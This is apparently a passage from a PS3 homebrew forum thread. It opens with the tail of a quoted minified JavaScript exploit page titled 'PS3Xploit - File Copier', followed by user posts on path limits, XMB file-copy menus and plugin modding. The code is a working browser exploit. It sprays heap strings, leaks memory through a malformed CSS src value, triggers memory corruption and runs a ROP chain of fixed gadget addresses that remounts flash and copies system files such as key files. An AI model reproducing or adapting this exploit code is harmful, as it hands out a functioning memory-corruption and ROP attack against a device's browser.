",progress_msg_frag2=\47%\74/h1\76\47,toc_addr=7296344,toc_entry1_addr=7185360,toc_entry2_addr=7494456,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255752,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332644,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380764,gadget7_addr=131024,gadget8_addr=131072,gadget11_addr=5874864,gadget12_addr=820812,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod12_addr=6500860,gadget_mod15_addr=3788856;document.write(\47\74html\76\74title\76PS3Xploit - File Copier\74/title\76\74b\76Source file path: \74/b\76\74input type="text" id="srcfile" name="srcfile" maxlength="200" size="50"\76\74br\76\74br\76\74b\76Destination file path: \74/b\76\74input type="text" id="desfile" name="desfile" maxlength="200" size="50"\76\74br\76\74br\76\74input type="button" value="Initialize" onclick="initROP(true)"/\76\74div id="result"\76\74/div\76\74div id="exploit"\76\74/div\76\74div id="trigger"\76\74/div\76\74/html\76\47);function setInnerHTML(a,b){if(a){a.innerHTML=b}}function showResult(a){setInnerHTML(document.getElementById(\47result\47),a)}function rop_exit_1val(a,b,c){var d=xtra_data.substr(store_idx_arr1[0],2).toAscii(true);var e=xtra_data.substr(store_idx_arr2[0],2).toAscii(true);var f;if((parseInt(d,16)!==0)&&(parseInt(d,16)===(parseInt(e,16)))){f=a}else{if(c){if((parseInt(d,16)!==parseInt(e,16))||(parseInt(d,16)===0))b+=c}f=b}showResult(f)}function syscall_r3_p2p(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4b_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function syscall_r3r5_p2p(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(d-0x4)+hexdw2bin(gtemp_addr)+fill_by_8bytes(0x18,dbyte41)+hexdw2bin(gadget_mod4c_addr)+fill_by_16bytes(0xB0,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4b_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function copy_file_overwrite(a,b,c,d,e,f,g,h,i,j){return memcpy(h+stat_size_offset,i,dword_size)+syscall(sc_fs_stat,a,h,0,0,0,0,0,0)+memcpy(j,h+stat_size_offset,word_size)+syscall(sc_fs_open,a,fs_flag_readonly,c,0,0,0,0,0)+syscall_r3r5_p2p(sc_fs_read,c,e,h+stat_size_offset,f,0,0,0,0,0,0)+syscall_r3_p2p(sc_fs_close,c,0,0,0,0,0,0,0,0,0)+validate_word_from_ptr(f+0x4,b,0)+syscall(sc_fs_open,b,fs_flag_create,d,fs_mode,i,0,0,0)+syscall_r3r5_p2p(sc_fs_write,d,e,h+stat_size_offset,g,0,0,0,0,0,0)+syscall_r3_p2p(sc_fs_close,d,0,0,0,0,0,0,0,0,0)}function load_r3_word_from_ptr_32(a,b,c,d,e,f,g){return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+hexdw2bin(a-0x8)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod15_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(b)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(f)+hexdw2bin(g)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function validate_word_from_ptr(a,b,c,d,e,f){if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}if(f===null){f=gtemp_addr}return load_r3_word_from_ptr_32(a,gtemp_addr,gtemp_addr,gtemp_addr,gtemp_addr,b,gtemp_addr)+hexdw2bin(gadget_mod12_addr)+fill_by_16bytes(0x70,dbyte00)+fill_by_8bytes(0x8,dbyte00)+hexdw2bin(c)+fill_by_16bytes(0x10,dbyte00)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(f)+hexdw2bin(c)+fill_by_8bytes(0x8,dbyte41)}function init_run(a,b,c,d,e){if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}offset_array=[];store_idx_arr1=[];store_idx_arr2=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;search_max_threshold=74*0x100000;search_base=0x80150000;search_size=2*mbytes;search_base_off=1*mbytes;search_size_ext=2*mbytes;total_loops++}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function load_check(){if(total_loops\74max_loops){showResult(progress_msg_frag1+((100/max_loops)*total_loops).toString()+progress_msg_frag2);t_out=setTimeout(initROP,500,false)}else{total_loops=0;showResult(fail_msg_frag);t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initROP(a){try{init_run(a,0x80200000,5/2*mbytes,0*mbytes,0*mbytes);var b=0x8B200000;template_1_file_usb=document.getElementById("srcfile").value;template_1_file_blind=document.getElementById("desfile").value;xtra_data=flash_partition.convert()+filesystem.convert()+mount_path.convert()+template_1_file_usb.convert()+fill_by_4bytes(0xC,dbyte00)+template_1_file_blind.convert()+fill_by_4bytes(0xC,dbyte00)+fill_by_16bytes(0x70,dbyte00)+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}flash_partition_addr=xtra_data_addr;fs_addr=flash_partition_addr+flash_partition.convertedSize()-0x4;mount_path_addr=fs_addr+filesystem.convertedSize();template_1_file_usb_addr=mount_path_addr+mount_path.convertedSize();template_1_file_usbfd_addr=template_1_file_usb_addr+template_1_file_usb.convertedSize();template_1_file_usb_readlen_addr=template_1_file_usbfd_addr+word_size;template_1_file_blind_addr=template_1_file_usb_readlen_addr+dword_size;template_1_file_blindfd_addr=template_1_file_blind_addr+template_1_file_blind.convertedSize();template_1_file_blind_writelen_addr=template_1_file_blindfd_addr+word_size;store_idx_arr1[0]=(template_1_file_blind_writelen_addr-flash_partition_addr+0x8)/2;null_addr=template_1_file_blind_writelen_addr+dword_size;store_idx_arr2[0]=(null_addr-flash_partition_addr+0xC)/2;stat_addr=null_addr+dword_size*0x3;stack_frame=stack_frame_hookup()+syscall(sc_fs_umount,flash_partition_addr,fs_addr,mount_path_addr,0,0,0,0,0)+copy_file_overwrite(template_1_file_usb_addr,template_1_file_blind_addr,template_1_file_usbfd_addr,template_1_file_blindfd_addr,b,template_1_file_usb_readlen_addr,template_1_file_blind_writelen_addr,stat_addr,null_addr,null_addr+0x8)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var c=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var d=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var f=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((d===jump_2)&&(f===jump_1)&&(x===xtra_data)&&(c===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit_1val,2000,"\74br\76\74h1\76\74b\76\74span style=\47color:green\47\76File copied successfully!\74/h1\76\74/span\76","\74br\76\74h1\76\74b\76\74span style=\47color:red\47\76File copy failed!\74/h1\76\74/span\76","");t_out=0;total_loops=0}');
Click to expand...

Good work , is there path length limit i need to copy iso.bin.enc from game directory from slus51234 from usrdir but i couldnt type all path in textbox?


Sent from my iPhone using Tapatalk
 
ayassinsayed said:
Good work , is there path length limit i need to copy iso.bin.enc from game directory from slus51234 from usrdir but i couldnt type all path in textbox?


Sent from my iPhone using Tapatalk
Click to expand...
This is a standard glitch with the browser on screen keyboard as far as i know. I get this issue just entering normal web address sometimes. You need to add it in parts if it decides to do that. So add up as far as it lets you, enter it, then press X again to edit it and it will let you add more.
 
aldostools said:
@lmn7 IIRC You also have a simple file copier with 2 parameters (source & destination files).

I have this idea: It would be nice for HAN & CFW users to have an XMB menu (organized by source folders) with the most frequently copied files already created + the copier above (for custom copy). Also the PKG Linker could be used to create a dynamic xml with the files to be copied.

@DeViL303 @ShaolinAssassin @pink1 What do you think?
Click to expand...

Do we need this ? I mean, @lmn7 's method here is much more faster/easier for copying files to HDD.

TBH, I think I only used the file copier once - just to test it. Which files are most frequently copied from HDD to USB ?
 
Im not sure either, its a nice idea if someone wants to do it. But we do already have almost every file in the firmware in drop down menus on the exploit pages, so those are kind of covered. I know icons for everyone could be done too and would be quicker maybe, not sure as you have to scroll list either on the XMB or on the webpage.

I might be easier to make a webpage with all the injectors on it, than to make icon for each file on the XMB.

See the pics, maybe all these could be combined somehow with different buttons for file type or something. IDK.

EDIt: I suppose that is not offline though.
 

Attachments

  • upload_2019-4-16_16-56-32.png
    upload_2019-4-16_16-56-32.png
    111 KB · Views: 220
  • upload_2019-4-16_16-58-1.png
    upload_2019-4-16_16-58-1.png
    108.1 KB · Views: 227
  • upload_2019-4-16_16-58-52.png
    upload_2019-4-16_16-58-52.png
    121.1 KB · Views: 230
ShaolinAssassin said:
Do we need this ? I mean, @lmn7 's method here is much more faster/easier for copying files to HDD.

TBH, I think I only used the file copier once - just to test it. Which files are most frequently copied from HDD to USB ?
Click to expand...

Yes, the new PKG maker by lmn7 is faster and more convenient for copy to HDD / dev_blind.

The idea is more extract files from the system directly from XMB.

DeViL303 said:
Im not sure either, its a nice idea if someone wants to do it. But we do already have almost every file in the firmware in drop down menus on the exploit pages, so those are kind of covered. I know icons for everyone could be done too and would be quicker maybe, not sure as you have to scroll list either on the XMB or on the webpage.

I might be easier to make a webpage with all the injectors on it, than to make icon for each file on the XMB.

See the pics, maybe all these could be combined somehow with different buttons for file type or something. IDK.

EDIt: I suppose that is not offline though.
Click to expand...

Yes, the online copier is convenient. I mean using the offline copiers directly from XMB. Also not all, only the more frequent files (e.g xRegistry.sys, category_game.xml, act.dat, eid_root_key, coldboot.raf, etc.)

The idea is to extend it to be able to generate dynamic XML via PKG Linker or maybe with wMM, so we can copy files to USB easily like we do with pictures/music/videos without having to open a web page (e.g. webman's File Manager or the online file copier). But also could be used to copy files from USB as an alternative to the custom PKG Maker of lmn7.

Well it was just an idea... anyway I always use FTP directly from Windows Explorer when I need to copy files :-p
 
Last edited:
I see now more. I misread and thought you meant recreate entire structure of flash on the XMB. Having some offline versions for most common files makes much more sense.

For CFW, Its a shame we cant go one step further, and create a rco for the extended xai_plugin, a rco that would give us the device/path options when required in conjunction with the sprx. We could maybe have a full XMB file manager then , with dynamically created xmls based on existing files on hdd/flash/usb, and then you press X on them, and get pop up like download_plugin does with existing devices. Probably not hard if we knew how. :)

NTFS and zip support added to xai would be great too but thats off topic. :)
 
ayassinsayed said:
Good work , is there path length limit i need to copy iso.bin.enc from game directory from slus51234 from usrdir but i couldnt type all path in textbox?


Sent from my iPhone using Tapatalk
Click to expand...
You could do that with the first version of the file copier, but Sony has implemented some stupid character restriction when first entering text. No idea why they thought that was a good idea, but it has nothing to do with me.

You can't copy larger files with the file copier either, as it copies the entire file contents into memory... seriously, there's no standard file copy syscall (that I know of) that allows you to copy files between devices. Blame Sony for everything.

aldostools said:
BTW Now that you have been modding download_plugin, I wonder if you could look if filecopy_plugin or maybe data_copy_plugin could be hacked to copy other file types (e.g. like .iso or .pkg).
Click to expand...
On the wiki someone documented the arguments that are passed to those plugins, I don't really understand it but you can have a look and see if you can figure it out. Another issue is, how can we pass multiple arguments through module_action? I've tried using spaces to separate the parameters, but that doesn't seem to work.
 
You must log in or register to reply here.

Similar threads

Back
Top